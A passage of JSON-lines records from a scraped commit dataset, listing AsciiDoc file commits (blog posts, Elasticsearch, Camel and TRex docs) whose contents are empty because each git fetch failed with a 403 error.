uses...\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/025_development\/050_who-uses-dtc.adoc","new_file":"src\/docs\/025_development\/050_who-uses-dtc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd79f82e37f4f4a1ba0a723a6d99f8754fcebdbd","subject":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","message":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d317d1c0341389f7a8ec6fefc8975e0998e5ac87","subject":"Update 2016-01-25-Moving-from-Spain-to-the-Netherlands.adoc","message":"Update 2016-01-25-Moving-from-Spain-to-the-Netherlands.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-01-25-Moving-from-Spain-to-the-Netherlands.adoc","new_file":"_posts\/2016-01-25-Moving-from-Spain-to-the-Netherlands.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03c09089a7fe4f4d8ce274211afdc150ad33726d","subject":"Update 2016-6-25-Git-one.adoc","message":"Update 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-25-Git-one.adoc","new_file":"_posts\/2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29f025c5ee945441c0a22c5426bec7b51aec6b4c","subject":"Update 2017-04-06-Test-1.adoc","message":"Update 2017-04-06-Test-1.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-06-Test-1.adoc","new_file":"_posts\/2017-04-06-Test-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d9f1d852c3b78994173b770f09832fa457bbe19","subject":"Update 2018-02-09-Keras-quick-way-to-order-word-by-T-F-I-D-F-to-generate-a-list-of-stopword.adoc","message":"Update 2018-02-09-Keras-quick-way-to-order-word-by-T-F-I-D-F-to-generate-a-list-of-stopword.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2018-02-09-Keras-quick-way-to-order-word-by-T-F-I-D-F-to-generate-a-list-of-stopword.adoc","new_file":"_posts\/2018-02-09-Keras-quick-way-to-order-word-by-T-F-I-D-F-to-generate-a-list-of-stopword.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eee4b00b7c93a1905eac51f12422dfafdca932dd","subject":"y2b create post Mobee Magic Charger Unboxing (Apple Magic Mouse)","message":"y2b create post Mobee Magic Charger Unboxing (Apple Magic Mouse)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-22-Mobee-Magic-Charger-Unboxing-Apple-Magic-Mouse.adoc","new_file":"_posts\/2011-11-22-Mobee-Magic-Charger-Unboxing-Apple-Magic-Mouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"108d8905e290e6c8c9c7fbaaf13925792abd74fd","subject":"Add note to docs regarding JAVA_HOME on Windows","message":"Add note to docs regarding JAVA_HOME on Windows\n\nFor the Windows service, JAVA_HOME should be set to the path to the\r\nJDK. We should make this clear in the docs to help users avoid\r\nfrustrating startup problems.\r\n\r\nRelates #24260\r\n","repos":"GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,alexshadow007\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,nezirus\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,winstonewert\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,wangtuo\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,alexshadow007\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,jimczi\/elasticsearch,qwerty4030\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,mjason3\/elasticsearch,coding0011\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,vroyer\/elassandra,nezirus\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,lks21c\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/setup\/install\/windows.asciidoc","new_file":"docs\/reference\/setup\/install\/windows.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2498648a3b8ed8156cdd549a7dcde914ad1f4729","subject":"Added translation to english of TPH-FollowUp_en.adoc - based on Google Translate","message":"Added translation to english of TPH-FollowUp_en.adoc - based on Google Translate\n","repos":"DIPSASA\/dips-ckm,bjornna\/dips-ckm","old_file":"doc\/determination\/TPH-FollowUp_en.adoc","new_file":"doc\/determination\/TPH-FollowUp_en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjornna\/dips-ckm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da0efcdb1413852c76526ffc665f12ef7f1da356","subject":"Added idempotentConsumer EIP base docs","message":"Added idempotentConsumer EIP base docs\n","repos":"pmoerenhout\/camel,pax95\/camel,apache\/camel,apache\/camel,akhettar\/camel,kevinearls\/camel,kevinearls\/camel,gautric\/camel,alvinkwekel\/camel,gautric\/camel,ullgren\/camel,christophd\/camel,onders86\/camel,kevinearls\/camel,dmvolod\/camel,rmarting\/camel,snurmine\/camel,punkhorn\/camel-upstream,tdiesler\/camel,tadayosi\/camel,curso007\/camel,pax95\/camel,adessaigne\/camel,nicolaferraro\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,sverkera\/camel,onders86\/camel,tdiesler\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,Fabryprog\/camel,kevinearls\/camel,christophd\/camel,isavin\/camel,mcollovati\/camel,tdiesler\/camel,objectiser\/camel,apache\/camel,dmvolod\/camel,kevinearls\/camel,gnodet\/camel,jonmcewen\/camel,curso007\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,alvinkwekel\/camel,anoordover\/camel,pax95\/camel,zregvart\/camel,punkhorn\/camel-upstream,pax95\/camel,CodeSmell\/camel,mcollovati\/camel,Fabryprog\/camel,pax95\/camel,snurmine\/camel,anoordover\/camel,apache\/camel,cunningt\/camel,sverkera\/camel,alvinkwekel\/camel,akhettar\/camel,pmoerenhout\/camel,onders86\/camel,ullgren\/camel,davidkarlsen\/camel,DariusX\/camel,sverkera\/camel,onders86\/camel,gnodet\/camel,cunningt\/camel,gautric\/camel,ullgren\/camel,Fabryprog\/camel,jamesnetherton\/camel,rmarting\/camel,akhettar\/camel,pmoerenhout\/camel,gnodet\/camel,nicolaferraro\/camel,rmarting\/camel,jamesnetherton\/camel,jonmcewen\/camel,dmvolod\/camel,onders86\/camel,apache\/camel,anoordover\/camel,snurmine\/camel,onders86\/camel,objectiser\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,dmvolod\/camel,DariusX\/camel,tdiesler\/camel,isavin\/camel,dmvolod\/camel,CodeSmell\/camel,jamesnetherton\/camel,tdiesler\/camel,jamesnetherton\/camel,DariusX\/camel,gnodet\/camel,sverkera\/camel,nikhilvibhav\/camel,cunningt\/camel,curso007\/camel,nicolaferraro\/camel,pmoerenhout\/camel,anoordover\/camel,tadayosi\/camel,tadayosi\/camel,jamesnetherton\/camel,gautric\/camel,isavin\/camel,jonmcewen\/camel,ullgren\/camel,sverkera\/camel,zregvart\/camel,jonmcewen\/camel,zregvart\/camel,CodeSmell\/camel,rmarting\/camel,jonmcewen\/camel,cunningt\/camel,isavin\/camel,davidkarlsen\/camel,nicolaferraro\/camel,curso007\/camel,snurmine\/camel,davidkarlsen\/camel,curso007\/camel,rmarting\/camel,objectiser\/camel,snurmine\/camel,dmvolod\/camel,gautric\/camel,nikhilvibhav\/camel,adessaigne\/camel,Fabryprog\/camel,adessaigne\/camel,akhettar\/camel,jamesnetherton\/camel,tadayosi\/camel,DariusX\/camel,sverkera\/camel,mcollovati\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,objectiser\/camel,gautric\/camel,CodeSmell\/camel,isavin\/camel,isavin\/camel,christophd\/camel,mcollovati\/camel,kevinearls\/camel,cunningt\/camel,gnodet\/camel,curso007\/camel,cunningt\/camel,anoordover\/camel,snurmine\/camel,pmoerenhout\/camel,akhettar\/camel,christophd\/camel,jonmcewen\/camel,rmarting\/camel,akhettar\/camel,christophd\/camel,adessaigne\/camel,zregvart\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/idempotentConsumer-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/idempotentConsumer-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba57d05d603eb874b38fa48141d3c26527486d54","subject":"y2b create post Sony Dash Unboxing \\u0026 Overview","message":"y2b create post Sony Dash Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-23-Sony-Dash-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-03-23-Sony-Dash-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59e78dc2e15311ed89a4f67df27fbf23b0c63bd2","subject":"Update 2016-03-12-Moved-to-Hub-Press-from-Jekyll-S3.adoc","message":"Update 2016-03-12-Moved-to-Hub-Press-from-Jekyll-S3.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-03-12-Moved-to-Hub-Press-from-Jekyll-S3.adoc","new_file":"_posts\/2016-03-12-Moved-to-Hub-Press-from-Jekyll-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"248e2d22443ccba7a0dc94b13f47a9e5bed3aac9","subject":"y2b create post 4 Unique Gadgets You Didn't Know Existed...","message":"y2b create post 4 Unique Gadgets You Didn't Know Existed...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-30-4UniqueGadgetsYouDidntKnowExisted.adoc","new_file":"_posts\/2017-12-30-4UniqueGadgetsYouDidntKnowExisted.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6bd01029bacafbcb737f23b7225e52071072734","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d7b585501dfae5e760e606d7d94301af94e1d14","subject":"Update 2016-04-10-tcp-ip.adoc","message":"Update 2016-04-10-tcp-ip.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-10-tcp-ip.adoc","new_file":"_posts\/2016-04-10-tcp-ip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10d4245782925fc8db73edc15e6f191c3f2c0906","subject":"Update 2019-02-28-Perl10.adoc","message":"Update 2019-02-28-Perl10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-28-Perl10.adoc","new_file":"_posts\/2019-02-28-Perl10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1406cc110072d2e919aae6fbe193e9f9df6de6f","subject":"Update 2016-04-06-Tenemos-un-problema.adoc","message":"Update 2016-04-06-Tenemos-un-problema.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"241fb8d04b476a51b67f582f94fdcf6a082206ed","subject":"Update 2016-04-06-Tenemos-un-problema.adoc","message":"Update 2016-04-06-Tenemos-un-problema.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_file":"_posts\/2016-04-06-Tenemos-un-problema.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"196f706f1255b430ee094c5cb8da77e3f21e1dab","subject":"Update 2015-11-27-FormData-in-React-Native.adoc","message":"Update 2015-11-27-FormData-in-React-Native.adoc\n","repos":"doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io","old_file":"_posts\/2015-11-27-FormData-in-React-Native.adoc","new_file":"_posts\/2015-11-27-FormData-in-React-Native.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/doochik\/doochik.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c473ac3270052a5b6a98bb9eb269554a5ea2edf","subject":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","message":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d748b628c1bdf7dd5164cff089ce92f38ef99764","subject":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","message":"Update 2017-02-10-eps-wroom-32-and-esp-idf.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_file":"_posts\/2017-02-10-eps-wroom-32-and-esp-idf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27ace78bd8a7e3a89bf4f4942144bf05c6a787cd","subject":"Update 2017-05-31-Controll-Flow-Statements.adoc","message":"Update 2017-05-31-Controll-Flow-Statements.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Controll-Flow-Statements.adoc","new_file":"_posts\/2017-05-31-Controll-Flow-Statements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bac0541143ab1d13066600646f02f0b76dcd41ab","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c18cc901d02d6c793db19093e00c241e71a6f02","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"594bc81fad8dd3cd0a24e74adcd78fef12739698","subject":"Update 2015-11-04-Effective-Java-Principles-and-Objects.adoc","message":"Update 2015-11-04-Effective-Java-Principles-and-Objects.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-04-Effective-Java-Principles-and-Objects.adoc","new_file":"_posts\/2015-11-04-Effective-Java-Principles-and-Objects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9946c5d00b8e9a68a6e1d83e2f4da4d8ee902d11","subject":"y2b create post The DIY Jacket Upgrade, Thank Me Later","message":"y2b create post The DIY Jacket Upgrade, Thank Me Later","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-07-The-DIY-Jacket-Upgrade-Thank-Me-Later.adoc","new_file":"_posts\/2018-01-07-The-DIY-Jacket-Upgrade-Thank-Me-Later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73e9d9b25ae08ce461185c8a367e59d6f15fc8d7","subject":"First draft of the syntax rules","message":"First draft of the syntax rules\n","repos":"teozkr\/GearScript,teozkr\/GearScript","old_file":"Design\/Syntax.adoc","new_file":"Design\/Syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teozkr\/GearScript.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"998c03b5562e2d73a885a72cbc63545f6a514579","subject":"Deleted 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Deleted 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d2674505461a13e6d5ae32cc8b1fbe45fa8c593","subject":"y2b create post iPhone 5 Camera Test \\u0026 Review (iPhone 5 Camera Review - Still, Video \\u0026 Forward Facing Camera)","message":"y2b create post iPhone 5 Camera Test \\u0026 Review (iPhone 5 Camera Review - Still, Video \\u0026 Forward Facing Camera)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-21-iPhone-5-Camera-Test-u0026-Review-iPhone-5-Camera-Review--Still-Video-u0026-Forward-Facing-Camera.adoc","new_file":"_posts\/2012-09-21-iPhone-5-Camera-Test-u0026-Review-iPhone-5-Camera-Review--Still-Video-u0026-Forward-Facing-Camera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d05da98a3cd4f5587e8cc7265e634c12ba5e03c6","subject":"update supported OS","message":"update supported OS\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89f815bc42dc9f04f5e0f6900f84fedc9acf18c3","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 